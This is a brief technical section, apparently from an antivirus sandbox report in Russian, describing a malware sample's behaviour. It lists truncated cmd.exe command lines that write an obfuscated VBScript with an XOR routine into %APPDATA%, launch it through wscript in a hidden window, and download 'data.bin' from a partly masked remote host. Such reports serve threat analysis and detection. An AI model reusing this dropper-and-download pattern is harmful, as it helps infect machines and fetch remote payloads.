Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "DJs=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM BirO5f" "YmKK=19" "OTs" "fuNCTiON YIre24(Lz,TqBuEdW)" "GjA2KS=35" "YIre24=(Lz ANd nOT TqBuEdW)Or(Not Lz AnD TqBuEdW)" "OzA=28" "ENd fu...
- %APPDATA%\4211.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\4211.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "DJs=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM BirO5f" "YmKK=19" "OTs" "fuNCTiON YIre24(Lz,TqBuEdW)" "GjA2KS=35" "YIre24=(Lz ANd nOT TqBuEdW)Or(Not Lz AnD TqBuEdW)" "OzA=28" "ENd fu...' (со скрытым окном)